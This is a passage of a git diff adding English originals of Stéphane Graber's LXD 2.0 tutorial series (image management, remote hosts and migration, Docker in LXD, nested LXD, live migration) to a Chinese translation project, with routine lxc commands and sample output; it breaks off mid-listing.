+| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| old-ubuntu | 4d558b08f22f | no | ubuntu 12.04 LTS amd64 (release) (20160315) | x86_64 | 155.09MB | Mar 30, 2016 at 4:30am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| w (11 more) | d3703a994910 | no | ubuntu 15.10 amd64 (release) (20160315) | x86_64 | 153.35MB | Mar 30, 2016 at 4:31am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+| | 75182b1241be | no | ubuntu 14.04 LTS amd64 (release) (20160314) | x86_64 | 118.17MB | Mar 30, 2016 at 4:27am (UTC) |
++-------------+--------------+--------+---------------------------------------------+--------+----------+------------------------------+
+```
+
+To see everything LXD knows about a given image, you can use “lxc image info”:
+
+```
+stgraber@castiana:~$ lxc image info ubuntu
+Fingerprint: e8a33ec326ae7dd02331bd72f5d22181ba25401480b8e733c247da5950a7d084
+Size: 139.43MB
+Architecture: i686
+Public: no
+Timestamps:
+ Created: 2016/03/15 00:00 UTC
+ Uploaded: 2016/03/16 05:50 UTC
+ Expires: 2017/04/26 00:00 UTC
+Properties:
+ version: 12.04
+ aliases: 12.04,p,precise
+ architecture: i386
+ description: ubuntu 12.04 LTS i386 (release) (20160315)
+ label: release
+ os: ubuntu
+ release: precise
+ serial: 20160315
+Aliases:
+ - ubuntu
+Auto update: enabled
+Source:
+ Server: https://cloud-images.ubuntu.com/releases
+ Protocol: simplestreams
+ Alias: precise/i386
+```
+
+##### Editing images
+
+A convenient way to edit image properties and some of the flags is to use:
+
+lxc image edit
+This opens up your default text editor with something like this:
+
+autoupdate: true
+properties:
+ aliases: 14.04,default,lts,t,trusty
+ architecture: amd64
+ description: ubuntu 14.04 LTS amd64 (release) (20160314)
+ label: release
+ os: ubuntu
+ release: trusty
+ serial: "20160314"
+ version: "14.04"
+public: false
+You can change any property you want, turn auto-update on and off or mark an image as publicly available (more on that later).
+
+##### Deleting images
+
+Remove an image is a simple matter of running:
+
+```
+lxc image delete
+```
+
+Note that you don’t have to remove cached entries, those will automatically be removed by LXD after they expire (by default, after 10 days since they were last used).
+
+##### Exporting images
+
+If you want to get image tarballs from images currently in your image store, you can use “lxc image export”, like:
+
+```
+stgraber@dakara:~$ lxc image export old-ubuntu .
+Output is in .
+stgraber@dakara:~$ ls -lh *.tar.xz
+-rw------- 1 stgraber domain admins 656 Mar 30 00:55 meta-ubuntu-12.04-server-cloudimg-amd64-lxd.tar.xz
+-rw------- 1 stgraber domain admins 156M Mar 30 00:55 ubuntu-12.04-server-cloudimg-amd64-lxd.tar.xz
+```
+
+#### Image formats
+
+LXD right now supports two image layouts, unified or split. Both of those are effectively LXD-specific though the latter makes it easier to re-use the filesystem with other container or virtual machine runtimes.
+
+LXD being solely focused on system containers, doesn’t support any of the application container “standard” image formats out there, nor do we plan to.
+
+Our images are pretty simple, they’re made of a container filesystem, a metadata file describing things like when the image was made, when it expires, what architecture its for, … and optionally a bunch of file templates.
+
+See this document for up to date details on the [image format][1].
+
+##### Unified image (single tarball)
+
+The unified image format is what LXD uses when generating images itself. They are a single big tarball, containing the container filesystem inside a “rootfs” directory, have the metadata.yaml file at the root of the tarball and any template goes into a “templates” directory.
+
+Any compression (or none at all) can be used for that tarball. The image hash is the sha256 of the resulting compressed tarball.
+
+##### Split image (two tarballs)
+
+This format is most commonly used by anyone rolling their own images and who already have a compressed filesystem tarball.
+
+They are made of two distinct tarball, the first contains just the metadata bits that LXD uses, so the metadata.yaml file at the root and any template in the “templates” directory.
+
+The second tarball contains only the container filesystem directly at its root. Most distributions already produce such tarballs as they are common for bootstrapping new machines. This image format allows re-using them unmodified.
+
+Any compression (or none at all) can be used for either tarball, they can absolutely use different compression algorithms. The image hash is the sha256 of the concatenation of the metadata and rootfs tarballs.
+
+##### Image metadata
+
+A typical metadata.yaml file looks something like:
+
+```
+architecture: "i686"
+creation_date: 1458040200
+properties:
+ architecture: "i686"
+ description: "Ubuntu 12.04 LTS server (20160315)"
+ os: "ubuntu"
+ release: "precise"
+templates:
+ /var/lib/cloud/seed/nocloud-net/meta-data:
+ when:
+ - start
+ template: cloud-init-meta.tpl
+ /var/lib/cloud/seed/nocloud-net/user-data:
+ when:
+ - start
+ template: cloud-init-user.tpl
+ properties:
+ default: |
+ #cloud-config
+ {}
+ /var/lib/cloud/seed/nocloud-net/vendor-data:
+ when:
+ - start
+ template: cloud-init-vendor.tpl
+ properties:
+ default: |
+ #cloud-config
+ {}
+ /etc/init/console.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty1.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty2.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty3.override:
+ when:
+ - create
+ template: upstart-override.tpl
+ /etc/init/tty4.override:
+ when:
+ - create
+ template: upstart-override.tpl
+```
+
+##### Properties
+
+The two only mandatory fields are the creation date (UNIX EPOCH) and the architecture. Everything else can be left unset and the image will import fine.
+
+The extra properties are mainly there to help the user figure out what the image is about. The “description” property for example is what’s visible in “lxc image list”. The other properties can be used by the user to search for specific images using key/value search.
+
+Those properties can then be edited by the user through “lxc image edit” in contrast, the creation date and architecture fields are immutable.
+
+##### Templates
+
+The template mechanism allows for some files in the container to be generated or re-generated at some point in the container lifecycle.
+
+We use the pongo2 templating engine for those and we export just about everything we know about the container to the template. That way you can have custom images which use user-defined container properties or normal LXD properties to change the content of some specific files.
+
+As you can see in the example above, we’re using those in Ubuntu to seed cloud-init and to turn off some init scripts.
+
+### Creating your own images
+
+LXD being focused on running full Linux systems means that we expect most users to just use clean distribution images and not spin their own image.
+
+However there are a few cases where having your own images is useful. Such as having pre-configured images of your production servers or building your own images for a distribution or architecture that we don’t build images for.
+
+#### Turning a container into an image
+
+The easiest way by far to build an image with LXD is to just turn a container into an image.
+
+This can be done with:
+
+```
+lxc launch ubuntu:14.04 my-container
+lxc exec my-container bash
+
+lxc publish my-container --alias my-new-image
+```
+
+You can even turn a past container snapshot into a new image:
+
+```
+lxc publish my-container/some-snapshot --alias some-image
+```
+
+#### Manually building an image
+
+Building your own image is also pretty simple.
+
+1. Generate a container filesystem. This entirely depends on the distribution you’re using. For Ubuntu and Debian, it would be by using debootstrap.
+2. Configure anything that’s needed for the distribution to work properly in a container (if anything is needed).
+3. Make a tarball of that container filesystem, optionally compress it.
+4. Write a new metadata.yaml file based on the one described above.
+5. Create another tarball containing that metadata.yaml file.
+6. Import those two tarballs as a LXD image with:
+ ```
+ lxc image import --alias some-name
+ ```
+
+You will probably need to go through this a few times before everything works, tweaking things here and there, possibly adding some templates and properties.
+
+### Publishing your images
+
+All LXD daemons act as image servers. Unless told otherwise all images loaded in the image store are marked as private and so only trusted clients can retrieve those images, but should you want to make a public image server, all you have to do is tag a few images as public and make sure you LXD daemon is listening to the network.
+
+#### Just running a public LXD server
+
+The easiest way to share LXD images is to run a publicly visible LXD daemon.
+
+You typically do that by running:
+
+```
+lxc config set core.https_address "[::]:8443"
+```
+
+Remote users can then add your server as a public image server with:
+
+```
+lxc remote add --public
+```
+
+They can then use it just as they would any of the default image servers. As the remote server was added with “–public”, no authentication is required and the client is restricted to images which have themselves been marked as public.
+
+To change what images are public, just “lxc image edit” them and set the public flag to true.
+
+#### Use a static web server
+
+As mentioned above, “lxc image import” supports downloading from a static http server. The requirements are basically:
+
+* The server must support HTTPs with a valid certificate, TLS1.2 and EC ciphers
+* When hitting the URL provided to “lxc image import”, the server must return an answer including the LXD-Image-Hash and LXD-Image-URL HTTP headers
+
+If you want to make this dynamic, you can have your server look for the LXD-Server-Architectures and LXD-Server-Version HTTP headers which LXD will provide when fetching the image. This allows you to return the right image for the server’s architecture.
+
+#### Build a simplestreams server
+
+The “ubuntu:” and “ubuntu-daily:” remotes aren’t using the LXD protocol (“images:” is), those are instead using a different protocol called simplestreams.
+
+simplestreams is basically an image server description format, using JSON to describe a list of products and files related to those products.
+
+It is used by a variety of tools like OpenStack, Juju, MAAS, … to find, download or mirror system images and LXD supports it as a native protocol for image retrieval.
+
+While certainly not the easiest way to start providing LXD images, it may be worth considering if your images can also be used by some of those other tools.
+
+More information can be found here.
+
+### Conclusion
+
+I hope this gave you a good idea of how LXD manages its images and how to build and distribute your own. The ability to have the exact same image easily available bit for bit on a bunch of globally distributed system is a big step up from the old LXC days and leads the way to more reproducible infrastructure.
+
+### Extra information
+
+The main LXD website is at:
+Development happens on Github at:
+Mailing-list support happens on:
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+And if you don’t want or can’t install LXD on your own machine, you can always [try it online instead][3]!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/30/lxd-2-0-image-management-512/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/blob/master/doc/image-handling.md
+[2]: https://launchpad.net/simplestreams
+[3]: https://linuxcontainers.org/lxd/try-it
+
+原文:https://www.stgraber.org/2016/03/30/lxd-2-0-image-management-512/
diff --git a/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md b/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md
new file mode 100644
index 0000000000..bbeb4f3eea
--- /dev/null
+++ b/sources/tech/LXD/Part 6 - LXD 2.0--Remote hosts and container migration.md
@@ -0,0 +1,209 @@
+Part 6 - LXD 2.0: Remote hosts and container migration
+=======================================================
+
+This is the third blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Remote protocols
+
+LXD 2.0 supports two protocols:
+
+* LXD 1.0 API: That’s the REST API used between the clients and a LXD daemon as well as between LXD daemons when copying/moving images and containers.
+* Simplestreams: The Simplestreams protocol is a read-only, image-only protocol used by both the LXD client and daemon to get image information and import images from some public image servers (like the Ubuntu images).
+
+Everything below will be using the first of those two.
+
+### Security
+
+Authentication for the LXD API is done through client certificate authentication over TLS 1.2 using recent ciphers. When two LXD daemons must exchange information directly, a temporary token is generated by the source daemon and transferred through the client to the target daemon. This token may only be used to access a particular stream and is immediately revoked so cannot be re-used.
+
+To avoid Man In The Middle attacks, the client tool also sends the certificate of the source server to the target. That means that for a particular download operation, the target server is provided with the source server URL, a one-time access token for the resource it needs and the certificate that the server is supposed to be using. This prevents MITM attacks and only give temporary access to the object of the transfer.
+
+### Network requirements
+
+LXD 2.0 uses a model where the target of an operation (the receiving end) is connecting directly to the source to fetch the data.
+
+This means that you must ensure that the target server can connect to the source directly, updating any needed firewall along the way.
+
+We have [a plan][1] to allow this to be reversed and also to allow proxying through the client itself for those rare cases where draconian firewalls are preventing any communication between the two hosts.
+
+### Interacting with remote hosts
+
+Rather than having our users have to always provide hostname or IP addresses and then validating certificate information whenever they want to interact with a remote host, LXD is using the concept of “remotes”.
+
+By default, the only real LXD remote configured is “local:” which also happens to be the default remote (so you don’t have to type its name). The local remote uses the LXD REST API to talk to the local daemon over a unix socket.
+
+### Adding a remote
+
+Say you have two machines with LXD installed, your local machine and a remote host that we’ll call “foo”.
+
+First you need to make sure that “foo” is listening to the network and has a password set, so get a remote shell on it and run:
+
+```
+lxc config set core.https_address [::]:8443
+lxc config set core.trust_password something-secure
+```
+
+Now on your local LXD, we just need to make it visible to the network so we can transfer containers and images from it:
+
+lxc config set core.https_address [::]:8443
+Now that the daemon configuration is done on both ends, you can add “foo” to your local client with:
+
+```
+lxc remote add foo 1.2.3.4
+```
+
+(replacing 1.2.3.4 by your IP address or FQDN)
+
+You’ll see something like this:
+
+```
+stgraber@dakara:~$ lxc remote add foo 2607:f2c0:f00f:2770:216:3eff:fee1:bd67
+Certificate fingerprint: fdb06d909b77a5311d7437cabb6c203374462b907f3923cefc91dd5fce8d7b60
+ok (y/n)? y
+Admin password for foo:
+Client certificate stored at server: foo
+```
+
+You can then list your remotes and you’ll see “foo” listed there:
+
+```
+stgraber@dakara:~$ lxc remote list
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| NAME | URL | PROTOCOL | PUBLIC | STATIC |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| foo | https://[2607:f2c0:f00f:2770:216:3eff:fee1:bd67]:8443 | lxd | NO | NO |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| images | https://images.linuxcontainers.org:8443 | lxd | YES | NO |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| local (default) | unix:// | lxd | NO | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| ubuntu | https://cloud-images.ubuntu.com/releases | simplestreams | YES | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+| ubuntu-daily | https://cloud-images.ubuntu.com/daily | simplestreams | YES | YES |
++-----------------+-------------------------------------------------------+---------------+--------+--------+
+```
+
+### Interacting with it
+
+Ok, so we have a remote server defined, what can we do with it now?
+
+Well, just about everything you saw in the posts until now, the only difference being that you must tell LXD what host to run against.
+
+For example:
+
+```
+lxc launch ubuntu:14.04 c1
+```
+
+Will run on the default remote (“lxc remote get-default”) which is your local host.
+
+```
+lxc launch ubuntu:14.04 foo:c1
+```
+
+Will instead run on foo.
+
+Listing running containers on a remote host can be done with:
+
+```
+stgraber@dakara:~$ lxc list foo:
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.245.81.95 (eth0) | 2607:f2c0:f00f:2770:216:3eff:fe43:7994 (eth0) | PERSISTENT | 0 |
++------+---------+---------------------+-----------------------------------------------+------------+-----------+
+```
+
+One thing to keep in mind is that you have to specify the remote host for both images and containers. So if you have a local image called “my-image” on “foo” and want to create a container called “c2” from it, you have to run:
+
+```
+lxc launch foo:my-image foo:c2
+```
+
+Finally, getting a shell into a remote container works just as you would expect:
+
+```
+lxc exec foo:c1 bash
+```
+
+### Copying containers
+
+Copying containers between hosts is as easy as it sounds:
+
+```
+lxc copy foo:c1 c2
+```
+And you’ll have a new local container called “c2” created from a copy of the remote “c1” container. This requires “c1” to be stopped first, but you could just copy a snapshot instead and do it while the source container is running:
+
+```
+lxc snapshot foo:c1 current
+lxc copy foo:c1/current c3
+```
+
+### Moving containers
+
+Unless you’re doing live migration (which will be covered in a later post), you have to stop the source container prior to moving it, after which everything works as you’d expect.
+
+```
+lxc stop foo:c1
+lxc move foo:c1 local:
+```
+
+This example is functionally identical to:
+
+```
+lxc stop foo:c1
+lxc move foo:c1 c1
+```
+
+### How this all works
+
+Interactions with remote containers work as you would expect, rather than using the REST API over a local Unix socket, LXD just uses the exact same API over a remote HTTPS transport.
+
+Where it gets a bit trickier is when interaction between two daemons must occur, as is the case for copy and move.
+
+In those cases the following happens:
+
+1. The user runs “lxc move foo:c1 c1”.
+2. The client contacts the local: remote to check for an existing “c1” container.
+3. The client fetches container information from “foo”.
+4. The client requests a migration token from the source “foo” daemon.
+5. The client sends that migration token as well as the source URL and “foo”‘s certificate to the local LXD daemon alongside the container configuration and devices.
+6. The local LXD daemon then connects directly to “foo” using the provided token
+ A. It connects to a first control websocket
+ B. It negotiates the filesystem transfer protocol (zfs send/receive, btrfs send/receive or plain rsync)
+ C. If available locally, it unpacks the image which was used to create the source container. This is to avoid needless data transfer.
+ D. It then transfers the container and any of its snapshots as a delta.
+7. If succesful, the client then instructs “foo” to delete the source container.
+
+### Try all this online
+
+Don’t have two machines to try remote interactions and moving/copying containers?
+
+That’s okay, you can test it all online using our [demo service][2].
+The included step-by-step walkthrough even covers it!
+
+### Extra information
+
+The main LXD website is at:
+Development happens on Github at:
+Mailing-list support happens on:
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/19/lxd-2-0-your-first-lxd-container-312/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://github.com/lxc/lxd/issues/553
+[2]: https://linuxcontainers.org/lxd/try-it/
diff --git a/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md b/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md
new file mode 100644
index 0000000000..d9b35735b8
--- /dev/null
+++ b/sources/tech/LXD/Part 7 - LXD 2.0--Docker in LXD.md
@@ -0,0 +1,145 @@
+Part 7 - LXD 2.0: Docker in LXD
+==================================
+
+This is the seventh blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Why run Docker inside LXD
+
+As I briefly covered in the [first post of this series][1], LXD’s focus is system containers. That is, we run a full unmodified Linux distribution inside our containers. LXD for all intent and purposes doesn’t care about the workload running in the container. It just sets up the container namespaces and security policies, then spawns /sbin/init and waits for the container to stop.
+
+Application containers such as those implemented by Docker or Rkt are pretty different in that they are used to distribute applications, will typically run a single main process inside them and be much more ephemeral than a LXD container.
+
+Those two container types aren’t mutually exclusive and we certainly see the value of using Docker containers to distribute applications. That’s why we’ve been working hard over the past year to make it possible to run Docker inside LXD.
+
+This means that with Ubuntu 16.04 and LXD 2.0, you can create containers for your users who will then be able to connect into them just like a normal Ubuntu system and then run Docker to install the services and applications they want.
+
+### Requirements
+
+There are a lot of moving pieces to make all of this working and we got it all included in Ubuntu 16.04:
+
+- A kernel with CGroup namespace support (4.4 Ubuntu or 4.6 mainline)
+- LXD 2.0 using LXC 2.0 and LXCFS 2.0
+- A custom version of Docker (or one built with all the patches that we submitted)
+- A Docker image which behaves when confined by user namespaces, or alternatively make the parent LXD container a privileged container (security.privileged=true)
+
+### Running a basic Docker workload
+
+Enough talking, lets run some Docker containers!
+
+First of all, you need an Ubuntu 16.04 container which you can get with:
+
+```
+lxc launch ubuntu-daily:16.04 docker -p default -p docker
+```
+
+The “-p default -p docker” instructs LXD to apply both the “default” and “docker” profiles to the container. The default profile contains the basic network configuration while the docker profile tells LXD to load a few required kernel modules and set up some mounts for the container. The docker profile also enables container nesting.
+
+Now lets make sure the container is up to date and install docker:
+
+```
+lxc exec docker -- apt update
+lxc exec docker -- apt dist-upgrade -y
+lxc exec docker -- apt install docker.io -y
+```
+
+And that’s it! You’ve got Docker installed and running in your container.
+Now lets start a basic web service made of two Docker containers:
+
+```
+stgraber@dakara:~$ lxc exec docker -- docker run --detach --name app carinamarina/hello-world-app
+Unable to find image 'carinamarina/hello-world-app:latest' locally
+latest: Pulling from carinamarina/hello-world-app
+efd26ecc9548: Pull complete
+a3ed95caeb02: Pull complete
+d1784d73276e: Pull complete
+72e581645fc3: Pull complete
+9709ddcc4d24: Pull complete
+2d600f0ec235: Pull complete
+c4cf94f61cbd: Pull complete
+c40f2ab60404: Pull complete
+e87185df6de7: Pull complete
+62a11c66eb65: Pull complete
+4c5eea9f676d: Pull complete
+498df6a0d074: Pull complete
+Digest: sha256:6a159db50cb9c0fbe127fb038ed5a33bb5a443fcdd925ec74bf578142718f516
+Status: Downloaded newer image for carinamarina/hello-world-app:latest
+c8318f0401fb1e119e6c5bb23d1e706e8ca080f8e44b42613856ccd0bf8bfb0d
+
+stgraber@dakara:~$ lxc exec docker -- docker run --detach --name web --link app:helloapp -p 80:5000 carinamarina/hello-world-web
+Unable to find image 'carinamarina/hello-world-web:latest' locally
+latest: Pulling from carinamarina/hello-world-web
+efd26ecc9548: Already exists
+a3ed95caeb02: Already exists
+d1784d73276e: Already exists
+72e581645fc3: Already exists
+9709ddcc4d24: Already exists
+2d600f0ec235: Already exists
+c4cf94f61cbd: Already exists
+c40f2ab60404: Already exists
+e87185df6de7: Already exists
+f2d249ff479b: Pull complete
+97cb83fe7a9a: Pull complete
+d7ce7c58a919: Pull complete
+Digest: sha256:c31cf04b1ab6a0dac40d0c5e3e64864f4f2e0527a8ba602971dab5a977a74f20
+Status: Downloaded newer image for carinamarina/hello-world-web:latest
+d7b8963401482337329faf487d5274465536eebe76f5b33c89622b92477a670f
+```
+
+With those two Docker containers now running, we can then get the IP address of our LXD container and access the service!
+
+```
+stgraber@dakara:~$ lxc list
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+| docker | RUNNING | 172.17.0.1 (docker0) | 2001:470:b368:4242:216:3eff:fe55:45f4 (eth0) | PERSISTENT | 0 |
+| | | 10.178.150.73 (eth0) | | | |
++--------+---------+----------------------+----------------------------------------------+------------+-----------+
+
+stgraber@dakara:~$ curl http://10.178.150.73
+The linked container said... "Hello World!"
+```
+
+### Conclusion
+
+That’s it! It’s really that simple to run Docker containers inside a LXD container.
+
+Now as I mentioned earlier, not all Docker images will behave as well as my example, that’s typically because of the extra confinement that comes with LXD, specifically the user namespace.
+
+Only the overlayfs storage driver of Docker works in this mode. That storage driver may come with its own set of limitation which may further limit how many images will work in this environment.
+
+If your workload doesn’t work properly and you trust the user inside the LXD container, you can try:
+
+```
+lxc config set docker security.privileged true
+lxc restart docker
+```
+
+That will de-activate the user namespace and will run the container in privileged mode.
+
+Note however that in this mode, root inside the container is the same uid as root on the host. There are a number of known ways for users to escape such containers and gain root privileges on the host, so you should only ever do that if you’d trust the user inside your LXD container with root privileges on the host.
+
+### Extra information
+
+The main LXD website is at:
+Development happens on Github at:
+Mailing-list support happens on:
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/04/13/lxd-2-0-docker-in-lxd-712/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://www.stgraber.org/2016/03/11/lxd-2-0-introduction-to-lxd-112/
+[2]: https://linuxcontainers.org/lxd/try-it/
diff --git a/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md b/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md
new file mode 100644
index 0000000000..85d9873313
--- /dev/null
+++ b/sources/tech/LXD/Part 8 - LXD 2.0--LXD in LXD.md
@@ -0,0 +1,126 @@
+Part 8 - LXD 2.0: LXD in LXD
+==============================
+
+This is the eighth blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Introduction
+
+In the previous post I covered how to run [Docker inside LXD][1] which is a good way to get access to the portfolio of application provided by Docker while running in the safety of the LXD environment.
+
+One use case I mentioned was offering a LXD container to your users and then have them use their container to run Docker. Well, what if they themselves want to run other Linux distributions inside their container using LXD, or even allow another group of people to have access to a Linux system by running a container for them?
+
+Turns out, LXD makes it very simple to allow your users to run nested containers.
+
+### Nesting LXD
+
+The most simple case can be shown by using an Ubuntu 16.04 image. Ubuntu 16.04 cloud images come with LXD pre-installed. The daemon itself isn’t running as it’s socket-activated so it doesn’t use any resources until you actually talk to it.
+
+So lets start an Ubuntu 16.04 container with nesting enabled:
+
+```
+lxc launch ubuntu-daily:16.04 c1 -c security.nesting=true
+```
+
+You can also set the security.nesting key on an existing container with:
+
+```
+lxc config set security.nesting true
+```
+
+Or for all containers using a particular profile with:
+
+```
+lxc profile set security.nesting true
+```
+
+With that container started, you can now get a shell inside it, configure LXD and spawn a container:
+
+```
+stgraber@dakara:~$ lxc launch ubuntu-daily:16.04 c1 -c security.nesting=true
+Creating c1
+Starting c1
+
+stgraber@dakara:~$ lxc exec c1 bash
+root@c1:~# lxd init
+Name of the storage backend to use (dir or zfs): dir
+
+We detected that you are running inside an unprivileged container.
+This means that unless you manually configured your host otherwise,
+you will not have enough uid and gid to allocate to your containers.
+
+LXD can re-use your container's own allocation to avoid the problem.
+Doing so makes your nested containers slightly less safe as they could
+in theory attack their parent container and gain more privileges than
+they otherwise would.
+
+Would you like to have your containers share their parent's allocation (yes/no)? yes
+Would you like LXD to be available over the network (yes/no)? no
+Do you want to configure the LXD bridge (yes/no)? yes
+Warning: Stopping lxd.service, but it can still be activated by:
+ lxd.socket
+LXD has been successfully configured.
+
+root@c1:~# lxc launch ubuntu:14.04 trusty
+Generating a client certificate. This may take a minute...
+If this is your first time using LXD, you should also run: sudo lxd init
+
+Creating trusty
+Retrieving image: 100%
+Starting trusty
+
+root@c1:~# lxc list
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| trusty | RUNNING | 10.153.141.124 (eth0) | fd7:f15d:d1d6:da14:216:3eff:fef1:4002 (eth0) | PERSISTENT | 0 |
++--------+---------+-----------------------+----------------------------------------------+------------+-----------+
+root@c1:~#
+```
+
+It really is that simple!
+
+### The online demo server
+
+As this post is pretty short, I figured I would spend a bit of time to talk about the [demo server][2] we’re running. We also just reached the 10000 sessions mark earlier today!
+
+That server is basically just a normal LXD running inside a pretty beefy virtual machine with a tiny daemon implementing the REST API used by our website.
+
+When you accept the terms of service, a new LXD container is created for you with security.nesting enabled as we saw above. You are then attached to that container as you would when using “lxc exec” except that we’re doing it using websockets and javascript.
+
+The containers you then create inside this environment are all nested LXD containers.
+You can then nest even further in there if you want to.
+
+We are using the whole range of [LXD resource limitations][3] to prevent one user’s actions from impacting the others and pretty closely monitor the server for any sign of abuse.
+
+If you want to run your own similar server, you can grab the code for our website and the daemon with:
+
+```
+git clone https://github.com/lxc/linuxcontainers.org
+git clone https://github.com/lxc/lxd-demo-server
+```
+
+### Extra information
+
+The main LXD website is at:
+Development happens on Github at:
+Mailing-list support happens on:
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/04/14/lxd-2-0-lxd-in-lxd-812/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://www.stgraber.org/2016/04/13/lxd-2-0-docker-in-lxd-712/
+[2]: https://linuxcontainers.org/lxd/try-it/
+[3]: https://www.stgraber.org/2016/03/26/lxd-2-0-resource-control-412/
diff --git a/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md b/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md
new file mode 100644
index 0000000000..51f9c8b1a7
--- /dev/null
+++ b/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md
@@ -0,0 +1,328 @@
+Part 9 - LXD 2.0: Live migration
+=================================
+
+This is the ninth blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Introduction
+
+One of the very exciting feature of LXD 2.0, albeit experimental, is the support for container checkpoint and restore.
+
+Simply put, checkpoint/restore means that the running container state can be serialized down to disk and then restored, either on the same host as a stateful snapshot of the container or on another host which equates to live migration.
+
+### Requirements
+
+To have access to container live migration and stateful snapshots, you need the following:
+
+- A very recent Linux kernel, 4.4 or higher.
+- CRIU 2.0, possibly with some cherry-picked commits depending on your exact kernel configuration.
+- Run LXD directly on the host. It’s not possible to use those features with container nesting.
+- For migration, the target machine must at least implement the instruction set of the source, the target kernel must at least offer the same syscalls as the source and any kernel filesystem which was mounted on the source must also be mountable on the target.
+
+All the needed dependencies are provided by Ubuntu 16.04 LTS, in which case, all you need to do is install CRIU itself:
+
+```
+apt install criu
+```
+
+### Using the thing
+
+#### Stateful snapshots
+
+A normal container snapshot looks like:
+
+```
+stgraber@dakara:~$ lxc snapshot c1 first
+stgraber@dakara:~$ lxc info c1 | grep first
+ first (taken at 2016/04/25 19:35 UTC) (stateless)
+ ```
+
+A stateful snapshot instead looks like:
+
+```
+stgraber@dakara:~$ lxc snapshot c1 second --stateful
+stgraber@dakara:~$ lxc info c1 | grep second
+ second (taken at 2016/04/25 19:36 UTC) (stateful)
+ ```
+
+This means that all the container runtime state was serialized to disk and included as part of the snapshot. Restoring one such snapshot is done as you would a stateless one:
+
+```
+stgraber@dakara:~$ lxc restore c1 second
+stgraber@dakara:~$
+```
+
+#### Stateful stop/start
+
+Say you want to reboot your server for a kernel update or similar maintenance. Rather than have to wait for all the containers to start from scratch after reboot, you can do:
+
+```
+stgraber@dakara:~$ lxc stop c1 --stateful
+```
+
+The container state will be written to disk and then picked up the next time you start it.
+
+You can even look at what the state looks like:
+
+```
+root@dakara:~# tree /var/lib/lxd/containers/c1/rootfs/state/
+/var/lib/lxd/containers/c1/rootfs/state/
+├── cgroup.img
+├── core-101.img
+├── core-102.img
+├── core-107.img
+├── core-108.img
+├── core-109.img
+├── core-113.img
+├── core-114.img
+├── core-122.img
+├── core-125.img
